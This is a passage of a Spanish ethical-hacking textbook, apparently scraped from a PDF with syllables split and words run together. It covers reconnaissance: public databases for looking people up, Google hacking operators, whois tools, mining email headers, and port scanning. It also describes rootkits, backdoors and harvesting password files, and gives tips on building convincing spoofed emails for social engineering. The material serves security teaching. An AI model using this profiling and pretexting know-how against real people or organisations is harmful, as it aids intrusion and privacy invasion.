pro me ter un usua rio le gí ti mo, qui zás has ta vol ver se uno pa ra ha cer la con -sul ta (por ejemplo, en los sis te mas de con sul ta de ries go cre di ti cio y otros que sonabo na dos me dian te tar je ta de cré di to on li ne, es po si ble que el in tru so com pre esos

49

Roo tea do, es slang o lun far do y sig ni fi ca que el in tru so ha es ca la do pri vi le gios (ma yo -res per mi sos en el ser vi dor) en un sis te ma Li nux/Unix has ta lle gar a ser un usua rio conper mi sos de root (cuen ta de má xi mo pri vi le gio). Es to le da la po si bi li dad de rea li zarcuan to de see den tro del sis te ma, siem pre y cuan do se pa có mo.

Roo tea do

Hacking Etico - [PDF Document] (53)

da tos a nom bre de otro, con una tar je ta aje na). Por úl ti mo, tra ta rá de ob te ner la in -for ma ción de al guien que es té den tro de esa or ga ni za ción u em pre sa, ya sea poramis tad, con ve nien cia, in ter cam bio o en ga ño. Co mo ve mos, no hay límites. To do va le pa ra los in tru sos en la red, ya sea un chi -co que quie re de for mar una pá gi na, al guien que roo tea un ser vi dor des de el ker nelo bien un in tru so de di ca do a ha cer es pio na je cor po ra ti vo.Sea por el mo ti vo que sea, ego, cu rio si dad, de sa fío in te lec tual o di ne ro, al gu nos ac -tos es ta rán des car ta dos por la éti ca de ca da per so na, co mo el uso de tar je tas o el da -ño a sis te mas aje nos, pe ro no es ca ti ma rán re cur sos de tiem po y ló gi ca pa ra lo grar -los.

Base. Las agencias de seguridad tienen portales de búsqueda de datos, y algunosde estos organismos no poseen el acceso tan público. Intranets y extranets, o todo aquelespacio para la consulta de datos sea o no privado, son muy tentadores para los intrusos.

Con sul ta URL

His to rial la bo ral ww w.an ses .go v.a r/au to pis ta /Serv _pu bli cos /his to ria.htm Deu das, cré di tos www.b cra .go v.ar /cen ries /cr010000.as p?e rror=0 y tar je tas In gre sos de cla ra dos a la AFIPhttps ://se ti.a fip .go v.ar /pa dron-puc-cons tan cia-in ter net /Con sul taCons tan ciaAc tion .do

Obra so cial que po see ww w.an ses .go v.a r/au to pis ta /Serv _pu bli co s/ooss.htm In frac cio nes de trán si to www .bue no sai res .go v.a r/a reas /se gu ri dad _jus ti cia /jus ti cia _tra

bajo/adm_falta/?menu_id=5743 Fo to de la fa cha da www .ma pa .bue no sai res .go v.ar /si g/in dex.phtml de su ca sa

Bases Online. En al gu nas ba ses de da tos pú bli cas, se pue deen con trar in for ma ción acer ca de al guien con só lo te ner el nú me rode do cu men to, que se con si gue fá cil men te en el pa drón na cio nal.

50

Hacking Etico - [PDF Document] (54)

Una re co lec ción (mu cho me nos pa si va) de in for ma ción li ga da a ba ses de da tos porpar te de los in tru sos es aque lla que re sul ta in tru si va. Vea mos có mo pue den lo grares to: el in tru so pro gra ma o uti li za un mass roo ter (mez cla de es cá ner con ex ploit re -mo to 0day que per mi te me ter se den tro de los ser vi do res o ex traer da tos se cuen cial -men te a muy al ta ve lo ci dad), ba rrien do los ran gos de di rec cio nes IP. Es tos da tosson acu mu la dos (co lec cio na dos) pa ra uti li zar en un fu tu ro o bien apro ve chan do lain tru sión. Sea de paso, tambien pueden ins ta lar algunas de las si guien tes co sas:

• Back doors on-the-fly: Los back doors son puer tas tra se ras pa ra vol ver a in gre -sar cuan do así lo de seen, sin des per tar sos pe chas (en el ca so de los on-the-fly), yaque no de jan un puer to abier to o al go re mo ta men te de tec ta ble co mo pa ra sa berque exis te. Más in for ma ción acer ca de es ta avan za da téc ni ca, en www .hac ker z.ir/e-book s/i nit_r pi.txt (de ta lla có mo pat chear el ker nel OTF).

• Bi na rios tro ya ni za dos: El in tru so con co no ci mien tos suficientes sue le reem pla -zar a ma no algunos ar chi vos bi na rios de sis te ma (por ejem plo ps, lsof o ls en Li -nux) pa ra ocul tar pro ce sos o ar chi vos den tro del sis te ma ope ra ti vo. Cuan do uti -li ce és tos, el ad mi nis tra dor del sistema no se da rá cuen ta tan fá cil men te de quehay pro ce sos y ar chi vos nue vos en su ser vi dor.

• Root kits: És te es un kit o una se rie de apli ca cio nes que se utiliza pa ra man te nerlos pri vi le gios de root den tro del ser vidor, que no se ins ta la en for ma tan ar te sa -nal y sir ve pa ra man te ner pro ce sos ocul tos y, tal vez, una puer ta de en tra da. Los hay pa ra to dos los sis te mas ope ra ti vos.• Snif fers: Se trata de cap tu ra do res de lo gins o de cual quier cla se de pa que te. En el capítulo 8 hay ejemplos de cada uno.

Los ar chi vos más re co lec ta dos por es ta téc ni ca in tru si va son los sha dows de losser vi do res Li nux y So la ris, los SAM de los ser vi do res Win dows de la fa mi lia Ser -ver o ter mi na les XP (am bos po seen las cuen tas de sis te ma y sus pass words demo do ci fra do). Tam bién se pue den com pro me ter di rec ta men te me dian te des cui -dos de ad mi nis tra ción y no por fa llas en soft wa re, co mo por ejem plo, la fa mo sacuen ta SQL de nom bre sa, sin cla ve asig na da.

51

Un script-kid die no só lo ba rre (es ca nea bus can do o eje cu ta ex ploits al azar) los ran gos dedi rec cio nes IP. És tos, ex trae rán in for ma ción de car pe tas com par ti das o in tra net s/ex tra netssin res tric ción de ac ce so o con fa llas de in yec ción de có di go SQL, muy fá ci les de de tec tar yde uti li zar pa ra com pro me ter ser vi do res de empresas u otras or ga ni za cio nes.

Script kid die

Hacking Etico - [PDF Document] (55)

Así, qui zás, el ad mi nis tra dor tu vo de sac tua li za do un día de fin de se ma na su ser vi dor,pe ro és te ya fue com pro me ti do ca si sin ras tros. En el fu tu ro, si ese ser vi dor per te ne -ce a una or ga ni za ción a la que de be com pro me ter, el in tru so só lo de be rá bus car unode esos ar chi vos ex traí dos pre via men te, rom per el ci fra do de la cuen ta de sis te ma (yver el res to de sus da tos si los tie ne) pa ra así aho rrar se mu cho tiem po. Es muy pro -ba ble que un lo gin /pass sea coin ci den te en un ser vi dor de otro tra mo de red en laem pre sa o que, al me nos, sir van sus usua rios de sis te ma. Mu chas em pre sas nun ca sa -ben có mo fue ron com pro me ti das su pues ta men te hoy, pe ro el ca so es que lo fue ronini cial men te ha ce mu cho tiem po (por és ta o por otras téc ni cas más avan za das).

Bus ca do resLos bus ca do res son una in creí ble fuen te de cla si fi ca ción, aná li sis, bús que da y ca chéde in for ma ción, con fi den cial o no, so bre un ob je ti vo. Al ta vis ta fue el bus ca dor pre -fe ri do en los años 90, Ya hoo lo fue más cer ca del año 2000 y hoy lo es el ex ce len -te Goo gle. Se gu ra men te ha bre mos es cu cha do ha blar de Goo gle hac king, es de cir,uti li zar el fa mo so bus ca dor pa ra en con trar da tos re le van tes del ob je ti vo.

Google. De ta lles de una bús que da en Goo gle re la cio na dacon ar chi vos que con tie nen pass words en ta blas SQL.

Entonces, vea mos aho ra una lis ta bas tan te com ple ta de bús que das de ter mi na dasque se pueden hacer pa ra en con trar in for ma ción li ga da a in tru sio nes: ar chi vos conin for ma ción sen si ble, con fi gu ra cio nes, ba ses de da tos, de ta lles de vul ne ra bi li da des,

52

Hacking Etico - [PDF Document] (56)

avi sos, usua rios, en tra das de lo gueo, lo gins, di rec to rios pri va dos, erro res tí pi cos deun sis te ma ope ra ti vo o apli ca ción en es pe cial, et cé te ra. Por su par te, el pro yec to Goo gle Hack Ho ney pot (http://ghh .sour ce for ge .net)me re ce es pe cial aten ción.

GHH. Goo gle Hack Ho ney pot es un pro yec to pa ra es tu diary ana li zar a script-kid dies que uti li zan Goo gle pa ra bus car

de ter mi na dos pa rá me tros (de or ga ni za cio nes al azar) en el bus ca dor.

Se de no mi na Ho ney pot al sistema (tipo carnada) cu ya in ten ción es atraer a intrusossi mu lan do ser sis te mas vul ne ra bles o dé bi les a los ata ques. Es una he rra mien ta dese gu ri dad in for má ti ca usa da pa ra re co ger in for ma ción so bre los ata can tes y sus téc -ni cas. Los Ho ney pots pue den dis traer a los ata can tes y ad ver tir al ad mi nis tra dor delsis te ma de un ata que, ade más de per mi tir un exa men en pro fun di dad del ata can te,

53

No es po si ble de jar de re co men dar el ex ce len te li bro Goo gle Hac king for Pe ne tra tionTes ters, Vo lu me 2, de Johnny Long. En es ta obra, po de mos en con trar to dos los mé to -dos y com bi na cio nes de bús que da po si bles. Por otra par te, en http ://johnn y.i hacks tuff -.com/ghdb.php, se pue de en con trar la co no ci da Goo gle Hac king Da ta ba se.

Lec tu ra re co men da da

Hacking Etico - [PDF Document] (57)

du ran te y des pués del ata que. La gen te de Goo gle no es ton ta y lo más pro ba ble esque cuan do un ata can te, bus can do ob je ti vos al azar, co lo que al gu nos de los mé to -dos des cri tos en la GHDB (Goo gle Hack Da ta ba se) sea re di rec cio na do ha cia al gu -na ho ney pot o a una ma yo ría de links con re sul ta dos 404 y a más ho ney pots. Es toper mi te con tro lar los ata ques in dis cri mi na dos de script-kid dies, pe ro no así el ata -que a or ga ni za cio nes de mo do fo ca li za do.La tí pi ca bús que da ini cial de un ob je ti vo de ter mi na do se rá en ton ces: si te :si tio vic -ti ma .com. A si tio vic ti ma .com, lo an te ce de el ope ra dor avan za do si te:, que da rá co -mo re sul ta do una lis ta de sub do mi nios re la cio na dos o to das sus po si bles sec cio nes,in clu so, links. A par tir de allí, el in tru so o el pro fe sio nal co men za rán a in ves ti garto dos sus URLs, ca ché, sus fuen tes, sus da tos, apli ca cio nes y tec no lo gías. Tam biénco mo en la bús que da de un e-mail, es re co men da ble uti li zar la si guien te sin ta xis:

• @do mi nio vic ti ma .com: só lo el do mi nio pa ra ver más usua rios.• usua rio @do mi nio vic ti ma .com: e-mail com ple to.• usua rio do mi nio vic ti ma .com: con un es pa cio en blan co en el me dio.• usua rio: el usua rio so lo.• usua rio do mi nio deal gu nisp: pa ra en con trar otras po si bles ca si llas.

La bús que da de be pa sar más por la ló gi ca e in ven ti va nues tra (a ma no, cla ro) quepor los re cur sos au to ma ti za dos con los que con te mos pa ra to do lo que com pren -de el che queo. ¿Por qué? Por que ten dre mos in fi ni tas po si bi li da des de com bi na -ción en com pa ra ción con las que ten dría mos si pu sié ra mos una he rra mien ta quelo hi cie ra por no so tros. Por otro la do, lo gra re mos en ten der bien có mo se ha ceuna in ves ti ga ción me ti cu lo sa vía bus ca dor. Qui zás al prin ci pio lle ve más tiem po,pe ro a me di da que és te pa sa y se tie ne ma yor ex pe rien cia, los de ta lles y da tos sig -ni fi ca ti vos se rán más y me jor lo gra dos. A con ti nua ción, ve mos un lis ta do de ope -ra do res avan za dos de Goo gle:

• si te: bus ca to do lo re la cio na do al do mi nio.• in ti tle: si tios re la cio na dos al tí tu lo.• allin ti tle: si tios de tí tu los con to das las pa la bras de fi ni das.

54

Nun ca con vie ne pos tear (pu bli car) di rec cio nes de e-mail, me nos la de nues tra em pre -sa. Con vie ne usar una de Hot mail o Gmail. Ade más, no es re co men da ble usar nom -bres rea les, car gos o de ta lles, si no só lo nick na mes alea to rios. Si pos tea mos des denues tra em pre sa, re cor de mos usar un proxy http pa ra no de jar la di rec ción IP real allí.

Cui da do con los posts

Hacking Etico - [PDF Document] (58)

• inurl: pre sen te en el URL.• alli nurl: to do pre sen te en el URL.• fi lety pe: ti po de ar chi vo por bus car, ex ten sión.• allin text: to do pre sen te en el tex to por bus car.• link: quién lin kea a de ter mi na do si tio bus ca do.• inan chor: bus ca en el tex to uti li za do co mo link.• da te ran ge: bus ca en tre ran gos de fe chas.• ca che: bus ca den tro de los si tios ca chea dos.• in fo: in for ma ción so bre el si tio web bus ca do.• re la ted: bus ca si mi la res.• aut hor: au tor de men sa je en Goo gle Groups.• group: bus ca per te nen cia de gru po en Goo gle Groups.• pho ne book: bus ca nú me ros de te lé fo no.• in sub ject: bus ca ti tu la res de men sa jes en Goo gle Groups.• de fi ne: bus ca el sig ni fi ca do de de ter mi na do vo ca blo.

El uso del sím bo lo me nos (-) pa ra la ex clu sión de pa la bras es muy útil a la ho ra debus car en tre mu cho ma te rial; lo mis mo pa sa con las co mi llas (“ ”) en ca so de bus -car una fra se tex tual o el sím bo lo (+) pa ra re la cio nar.

Goolag. Es ta es la pan ta lla de la he rra mien ta Goo lag Scan ner pa ra Goo gle,

55

La bús que da avan za da de Goo gle en es pa ñol está en www .goo gle .co m/ad van ced -_search?h l=es. Ope ra do res y có mo usar los ser vi cios de bús que da de Goo gle: www .goo -gle .co m/in tl/es /fea tu res.html, www .goo gle .co m/ in tl/es /help /ba sics.html y www .goo gle -.co m/in tl/es /hel p/re fi ne search.html.

Bús que da avan za da y ope ra do res

Hacking Etico - [PDF Document] (59)

rea li za da por cDc (cult of the dead cow). Po de mos ba jar la de www .goo la g.org.Pa ra evi tar pro ble mas, en nues tros si tios web con vie ne uti li zar un fil tra dor de ro botsde in de xa ción, si no de sea mos que Goo gle u otro bus ca dor ca cheen el si tio o par tede ellos. In clu so, es re co men da ble blo quear spi ders en bus ca de e-mails pa ra evi tarspam. Pa ra crear ar chi vos es pe cia les, po de mos vi si tar ww w.in vi sion-grap hics -. com /ro botstxt _ge ne ra tor.html. Es im por tan te te ner en cuen ta que, si en el ar chi -vo ro bots.txt de cla ra mos di rec to rios pri va dos o sen si bles, un in tru so po drá leer lo.Hay que sa ber que el bus ca dor no in de xa to do el con te ni do del si tio y que el web -mas ter o ad mi nis tra dor pue de to mar re cau dos pa ra que el spi der in de xa dor no ca -chee al gu nos paths (di rec to rios o car pe tas) del mis mo si tio. De es ta ma ne ra, esospaths de be rán ser bus ca dos lue go sin el uso del bus ca dor.

Paths. Po de mos ver el ro bots.txt en un si tio del go bier no, in de xa do porGoo gle, que lis ta di rec to rios im por tan tes. Es to es un des cui do de ad mi nis tra ción,y su exis ten cia es una de las pri me ras co sas que un in tru so va a bus car en un si tio.

Al gu nas he rra mien tas au to ma ti zan la bús que da a tra vés de Goo gle, co moQGoo gle, Goo gleS can, Goo gle Enum o Si te Dig ger de Founds to ne. In con ta blesscripts en Perl y otras he rra mien tas po drán ser en con tra das en Se cu rity fo cus oPac kets torm pa ra bus car en Goo gle usua rios de sis te ma e in for ma ción re la cio -na da al foot prin ting (Back track 2.0 tie ne en su co lec ción va rias de és tas). Pe rola bús que da y el aná li sis ma nual es lo más re co men da ble pa ra ha cer lo de mo dopro fe sio nal di ri gi do a un ob je ti vo en con cre to. Siem pre hay que re vi sar las ca -ché de pá gi nas en el re sul ta do de las bús que das por que qui zás al gún da to his tó -

56

Hacking Etico - [PDF Document] (60)

ri co, no exis ten te a la fe cha, sea de uti li dad pa ra un em ba te. Al fi nal del ca pí tu -lo, ve re mos có mo cla si fi car es ta in for ma ción en con tra da me dian te los bus ca do -res y ana li za re mos de qué for ma nos pue de ser útil.

Otros re cur sos on li neHay otras ba ses de da tos pú bli cas y he rra mien tas que brin da rán da tos en tiem -po real en In ter net. Entre es tos úl ti mos, los si tios más co no ci dos en el pa sa dofue ron www .sams pa de.org y www .net craft .com, que per mi tían sa ber el sis te -ma ope ra ti vo de los ser vi do res, sus ran gos de di rec cio nes, qué sis te ma te nía his -tó ri ca men te, su up ti me, IP, los nom bres de ad mi nis tra do res, te lé fo nos y di rec -cio nes fí si cas, en tre otras co sas. Co mo ejem plo, vea mos qué da tos po de mos ob -te ner en el si tio ww w.all-net tools .com/tool box, que tie ne mu chas he rra mien -tas. An tes de uti li zar las, con vie ne leer aten ta men te el men sa je de ad ver ten cia(WAR NING) del si tio, ubi ca do al pie de la pá gi na.

• SmartW hois: en cuen tra in for ma ción acer ca de una di rec ción IP, host na me, in clu -yen do país, pro vin cia, ciu dad, nom bre del pro vee dor de In ter net, su ad mi nis tra dor.

• CountryW hois: de vuel ve el país de don de pro vie ne una di rec ción IP.• Tra ce Rou te: de vuel ve la má qui na y la IP de ca da sal to que da un pa que te des dela má qui na ori gi nal has ta la de des ti no por In ter net. Además, tam bién informa eltiem po en mi li se gun dos que tar da és te.

• Ping: en vía un echo re quest a una má qui na es pe ci fi ca en la red. Es to pue de seruti li za do pa ra che quear la co mu ni ca ción en tre dos má qui nas o pa ra ver si el hostes pe cí fi co es tá co rrien do o exis te.

• Ns Loo kup: re suel ve un host na me a di rec ción IP o vi ce ver sa.• Proxy Test: che quea si un Proxy es real men te anó ni mo. Es te tra ta de re co no cerla ver da de ra di rec ción IP in clu so si és ta se en cuen tra de trás de un Proxy httpd.

• En vi ron men tal Va ria bles Test: mues tra va rias con fi gu ra cio nes re mo tas delbrow ser y de nues tra má qui na.

57

Po de mos pro bar otros scripts y he rra mien tas pa ra ob te ner in for ma ción en si tios co mohttp :// mem ber.dnss tuff .com /pa ges /tools.php y http ://tools-on .net /net.shtml. Es te ti -po de he rra mien tas per mi ten, en par te, ubi car en In ter net a la or ga ni za ción ob je ti vo.

Más scripts

Hacking Etico - [PDF Document] (61)

Ping. Los co man dos tra ce rou te y pingdes de la con so la de co man dos (shell) de Li nux.

Mu chos de los da tos ob te ni dos a tra vés de es tas pá gi nas, también pue den con se -guir se di rec ta men te me dian te la utilización de co man dos de con so la en un sis te maope ra ti vo co mo Win dows, Li nux o Unix.

Tracert. Los co man dos tra cert y ping des dela con so la de co man dos (prompt) de Win dows.

58

Hacking Etico - [PDF Document] (62)

Otro mo do de ob te ner los es con he rra mien tas de in ter faz grá fi ca en di chos sis te -mas. La di fe ren cia en tre uti li zar es tas úl ti mas y ha cer lo de forma on li ne (a través desi tios) es que el in tru so há bil di fí cil men te lo ha ga des de su má qui na (a me nos quesea a tra vés de un ser vi dor proxy o in ter me dia rio) pa ra no de jar ras tros en el ob je -ti vo de los co man dos eje cu ta dos y su bús que da. El in tru so in te li gen te ja más de ja rásu di rec ción IP real en al gún log del ob je ti vo, a di fe ren cia del pro fe sio nal éti co queno ve ningún problema en hacerlo.

Tool. NetS can Tools, una de las más co no ci das en Win dows.

En cuan to a las ba ses de da tos on li ne, son las del ti po do mi nios re gis tra dos y aque -llas li ga das a di rec cio nes IP, por ejem plo: www .cuw hois .com, www .rob tex .com,www .re gis ter .com y www .lac nic .net. És tas da rán co mo re sul ta do de la bús que -da un pu ña do de da tos in te re san tes acer ca de la or ga ni za ción, en car ga dos, nom bresy di rec cio nes IP o ser vi do res, en tre otras co sas.

59

Si queremos ob te ner más in for ma ción so bre las me to do lo gías de che queo, po de mosvi si tar las si guien tes direcciones: ww w.oiss g.org, ww w.o was p.org, ww w.i se co m.in fo -/mi rro r/osstm m.en.2. 1.1.pdf y www .vul ne ra bi lit yas sess ment .co.uk /Pe ne tra tion -%20Test.html.

Me to do lo gías de che queo

Hacking Etico - [PDF Document] (63)

Tool 2. Net Tools 5 es una he rra mien ta win32 que cuen tacon mu chas fun cio nes úti les des de su ami ga ble in ter faz grá fi capa ra rea li zar IG. htt p://u sers .pan do ra .be/ah ma di /net tools.htm.

Pa ra ob te ner in for ma ción del ti po con te ni do his tó ri co de si tios, po de mos vi si tar,por ejem plo, ww w.ar chi ve.org. És te nos mues tra, en una lí nea tem po ral, las di fe -ren tes pá gi nas web que tu vo una ac tual. Lo im por tan te de es to es que mues tra va -ria cio nes de con te ni do en el tiem po (ima gi ne mos nom bres de con tac tos de em plea -dos, cuen tas de e-mail, ar chi vos o di rec to rios sen si bles, et cé te ra).

Ca be ce ras de co rreos elec tró ni cosLue go de en con trar un pu ña do de ca si llas de co rreo de la or ga ni za ción me dian teGoo gle o bien exa mi nan do de te ni da men te la pá gi na web ins ti tu cio nal, el in tru sotra ta rá de ubi car en la red a la or ga ni za ción me dian te al go de aná li sis o in te rac ción.In te rac ción en ca so de que no en cuen tre el có di go de al gún co rreo elec tró ni co deella, ya que de ha cer lo, só lo ten dría que ana li zar lo y co men zar a es ca near los puer -tos y los hosts de sus re des lue go de re sol ver sus di rec cio nes IP. Po drá tam bién com pa rar los con la di rec ción IP del si tio web de la empresa pa ra co -rro bo rar que es tán ter ce ri zan do el alo ja mien to web (hos ting) de su pá gi na web y

60

Hacking Etico - [PDF Document] (64)

ver si és ta no es tá alo ja do en su pro pia red. Tam bién obra rá de mo do ló gi co pa ra ob te ner otros da tos va lio sos o apro ve cha bles.La in for ma ción que pue de dar a un in tru so un sim ple co rreo elec tró ni co es muyva ria da e im por tan te. Ana li ce mos un ejem plo de có di go fuen te de un e-mail. Pa raver lo, si uti li za mos Ou tlook Ex press, de be mos ha cer un click con el bo tón de re -cho so bre el e-mail y allí ele gir Pro pie da des /De ta lles. Ca be acla rar que es te co rreoelec tró ni co es real, pe ro fue mí ni ma men te mo di fi ca do pa ra sal va guar dar la in te gri -dad de la se gu ri dad de la in for ma ción de esa or ga ni za ción.Si lo lee mos lí nea por lí nea de te ni da men te, ve re mos que su información tra za unca mi no has ta el re cep tor y lis ta los no dos o pos tas que rea li zó el mensaje has tallegar a nues tro bu zón. Ge ne ral men te, en tre ga da tos co mo los que ve mos a con ti -nua ción (ya sea des de el có di go fuen te o su con te ni do).

Código fuente de un correo electrónico

1- An ti vi rus: es te da to sir ve pa ra adap tar al gún mé to do pa ra la es ca la da deprivi le gios no de tec ta do por ese an ti vi rus.

2- Ser vers de co rreo: en es te ca so, qmail (htt p://es .wi ki pe dia.org /wi ki/Q -

61

Hacking Etico - [PDF Document] (65)

mail).3- Día y ho ra rio: im por tan te pa ra ver a qué ho ra tra ba jan o en qué fe cha res -

pon den los co rreos. 4 y 5 Nom bres de hosts de los SMTP: hay mu chosISP re gio na les y na cio na les que po seen fa llas y pue den com pro me ter se.El in tru so no du da rá de ha cer lo si el sis te ma de la or ga ni za ción es mu chomás se gu ro. Re cor dar que el in tru so no tie ne éti ca y ha rá lo que sea ne ce -sa rio pa ra in ter cep tar el flu jo de in for ma ción del ob je ti vo.

6- ISP: Ar net en es te ca so. El in tru so pue de in ten tar com pro me ter el ISP o to -do aquel no do por el que pa se la in for ma ción de la or ga ni za ción.

7- Di rec ción IP: de pen de de la to po lo gía de red y del ser vi cio de co rreo. Losco rreos brin dan la IP pú bli ca del ga te way o ser vi dor, el cual se pue de bus caren tre los ran gos de cla ra dos en al gu na en ti dad de re gis tro.

8- Nom bres de ter mi na les (PC): ter mi nal y unk nown (si, al gu nos le po nennom bres di ver ti dos de ese ti po: unk nown, HE LO, co mo tam bién los pe li -gro sos: con ta du ría, ge ren cia, re cep ción, et cé te ra). Sir ven pa ra ubi car los enuna red de di rec cio nes de IP di ná mi cas (que cam bian día a día, lue go conun sim ple es cá ner la ubi ca mos en ho ra rio co mer cial o acor de con el ho ra rioen que nos lle gó el e-mail).

9- Ori gen y ca si llas de co rreo: es te co rreo sa lió de un clien te adsl de Ar net, pa -só por su SMTP ter ce ri za do (Ar net). Su ca si lla de co rreo ins ti tu cio nal es tá li -ga da a un do mi nio .co m.ar re gis tra da en www .ni c.ar, del cual du ran te mu chotiem po se han po di do ex traer los e-mails con el que se re gis tra ban las per so -nas y en ti da des, co mo po de mos leer en www .de li to sin for ma ti cos .com /pro -tec cion da tos /ca so ni car.shtml.

10- Clien te de co rreo y sis te ma ope ra ti vo: Mi cro soft Ou tlook Ex press ver -sión 6.00.2900.2869. Win dows XP SP2 muy pro ba ble men te.

11- In for ma ción en el cuer po del men sa je: aquí po de mos en con trar:Nom bre de em plea do que fir ma y car go, pa ra uti li zar lue go al con tac tar conotro o tra tar de di lu ci dar lo gins (usua rios) con el tí pi co for ma to pri me ra le -tra del nom bre más ape lli do (cto ri) o el acla ra dor mo do nom bre pun to ape -lli do (car los .to ri).Te lé fo nos: pa ra ha cer lla ma das o ador nar fir mas fal sas con vin cen tes.Direcciones: pue den ser vir tan to pa ra hacer in for ma tion gat he ring en la vi dareal co mo pa ra in ge nie ría so cial. Ti pos de fir ma y ti pos de tem pla tes de co rreo: sir ven pa ra con fec cio nar co-

rreos idén ti cos pa ra otros ni ve les de la or ga ni za ción y así po ner en mar cha

62

Hacking Etico - [PDF Document] (66)

otra téc ni ca, co mo la in ge nie ría so cial.Logos: pa ra re pli car lo gos si mi la res en ca so de pre pa rar con sul tas con vincen tes de su pues tos co le gas o cu rio sos.Con tac tos: pa ra co no cer pues tos u otros usua rios.Me ca nis mos de ci fra do: por ejem plo, en una fir ma pue de es tar un ID PGP.Si un in tru so da con un usua rio de una or ga ni za ción con esa fir ma, au to má ti camen te va a sa ber que ese usua rio ma ne ja rá in for ma ción sen si ble que debe ci-frar pa ra co mu ni car la y cen tra rá es pe cial aten ción en él. Apli ca cio nes: los con te ni dos sue len ir fir ma dos por otros ti pos de apli ca cio nes. Otra in for ma ción: tam bién po de mos en con trar el (Cam po CC:) Otros usua rios de la or ga ni za ción: al so li ci tar co pias o reen víos y al pro bar los co mo usua rio de sis te ma, com pro bar su ac tual exis ten cia en la em pre sa.Tra mos de red in ter nas: al gu nos e-mails dan los nom bres de má qui nas de unared in ter na y sus res pec ti vas di rec cio nes IP.

En ca so de que el in tru so no en cuen tre có di go fuen te de es te ti po me dian te Goo -gle, só lo tie ne que pre gun tar al go li ga do a la or ga ni za ción a un mail de con tac to oa al gu na de las ca si llas que en con tró. No tie ne aún que men tir o uti li zar in ge nie riaso cial, te ma que abor da re mos en el pró xi mo ca pí tu lo.Por ejem plo, si la or ga ni za ción ven de má qui nas agro pe cua rias y se le pre gun ta elcos to de una o la for ma de pa go, no ne ce sa ria men te se es tá en ga ñan do o min tien -do al re cep tor en cuan to a con te ni do, sal vo in di rec ta men te en la in ten ción pos te -rior del in tru so. És te se gu ra men te va a es cri bir al gu na con sul ta a la ca si lla de co rreoin fo @do mi nio vic ti ma .com y es pe ra rá una res pues ta pa ra ana li zar su có di go fuen tey, así, ob te ner ese ti po de in for ma ción.

Es ca neo y fin ger prin tingEn al gu nos lu ga res, es tas téc ni cas se des cri ben por se pa ra do de lo que es in for ma tiongat he ring. En es te ca so no, ya que el eje cu tor a tra vés del es ca neo y fin ger prin ting node ja de re co pi lar in for ma ción (bas tan te sig ni fi can te) al ases tar un es ca neo a los hosts(ma peo de red) del ob je ti vo o al pro ce sar la in for ma ción que brin da és te co mo re sul ta -do.El in tru so o el pro fe sio nal éti co, a tra vés del em pleo de las téc ni cas an te rio res, halo gra do ubi car en In ter net a la or ga ni za ción ob je ti vo me dian te ran gos de di rec cio -nes IP y do mi nios. Aun que se gu ra men te dis po ne de otra in for ma ción más de ta lla -da, con es tos mé to dos bus ca rá co no cer:

• Si los hosts (PC y ser vers) de una red o de ter mi na do ran go de In ter net es tán vi -vos (fun cio nan do) a tra vés de un net work scan ning o es ca neo de red. Gra cias a

63

Hacking Etico - [PDF Document] (67)

és te, tam bién po drá re sol ver sus nom bres y di rec cio nes IP e, in clu so, po drá lo ca -li zar de ter mi na do nom bre de host o ter mi nal den tro del ran go.

• A tra vés de un port scan ning: qué puer tos es tán abier tos, fil tra dos o ce rra dos.Por otro la do, también intentará averiguar qué ti po y ver sión de apli ca ción es táco rrien do en esos puer tos y qué ser vi cios.

• Con el fin ger prin ting: qué sis te ma ope ra ti vo, ver sión de apli ca ción o ker nel po -see el ser vi dor vi vo.

• Con el vul ne ra bi lity scan ning po drá co no cer des cui dos de ad mi nis tra ción ovul ne ra bi li da des pre via men te co no ci das.

Aho ra vea mos las res pues tas a dos pre gun tas im por tan tes. ¿Có mo se efec túa, téc ni ca -men te, el es ca neo de puer tos y con qué he rra mien tas se lle va a ca bo? En pri mer lu gar,pa ra en ten der el con cep to hay que te ner ple no co no ci mien to de la fa mi lia de pro to co -los TC P/IP. Igual men te, vea mos lo que sig ni fi ca es ca neo de puer tos TCP SYN se gúnWi ki pe dia

“Pa ra es ta ble cer una co ne xión nor mal TCP, es ne ce sa rio se guir una ne go cia ción detres pa sos. Es ta ne go cia ción es ini cia da con un pa que te SYN en la má qui na de ori -gen, al que la má qui na de des ti no co rres pon de con un pa que te SY N/ACK, que esfi nal men te res pon di do por la má qui na que ini cia la co ne xión por un pa que te ACK.Una vez que se han cum pli do es tos pa sos, es tá he cha la co ne xión TCP.Un ras trea dor de puer tos en vía mu chos pa que tes SYN a la má qui na que se es tápro ban do, y mi ra de qué for ma re gre san los pa que tes pa ra ver el es ta do de los puer -tos en el des ti no, in ter pre tán do los de la si guien te for ma:- Si al en viar un pa que te SYN a un puer to es pe cí fi co, el des ti no de vuel ve un SY -N/ACK, el puer to es tá abier to y es cu chan do co ne xio nes. - En otro ca so, si re gre -sa un pa que te RST, el puer to es tá ce rra do. - Por úl ti mo, si no re gre sa el pa que te, osi se re ci be un pa que te ICMP Port Un rea cha ble, el puer to es tá fil tra do por al gúnti po de cor ta fue gos.Ha cien do es te pro ce di mien to pa ra una lis ta de puer tos co no ci dos, se lo gra ob te nerun in for me de es ta do de los puer tos de la má qui na pro ba da.”En: htt p://es .wi ki pe dia.org /wi ki/Es cá ner _de _puer tosVea mos un lis ta do de puer tos:

NNúú mmee rroo ddee ppuueerr ttoo DDeess ccrriipp cciióónn

1 TCP Port Ser vi ce Mul ti ple xer TCP MUX 5 Re mo te Job Entry (RJE) 7 ECHO 18 Mes sa ge Send Pro to col (MSP) 20 FTP – Da ta 21 FTP – Con trol

64

Hacking Etico - [PDF Document] (68)

22 SSH Re mo te Lo gin Pro to col 23 Tel net 25 Sim ple Mail Trans fer Pro to col (SMTP) 29 MSG ICP 37 Ti me 42 Host Na me Ser ver (Na me serv) 43 WhoIs 49 Lo gin Host Pro to col (Lo gin) 53 Do main Na me Sys tem (DNS) 69 Tri vial Fi le Trans fer Pro to col (TFTP) 70 Gop her Ser vi ces 79 Fin ger 80 HTTP 103 X.400 Stan dard 108 SNA Ga te way Ac cess Ser ver 109 POP2 110 POP3 115 Sim ple Fi le Trans fer Pro to col (SFTP)

NNúú mmee rroo ddee ppuueerr ttoo DDeess ccrriipp cciióónn

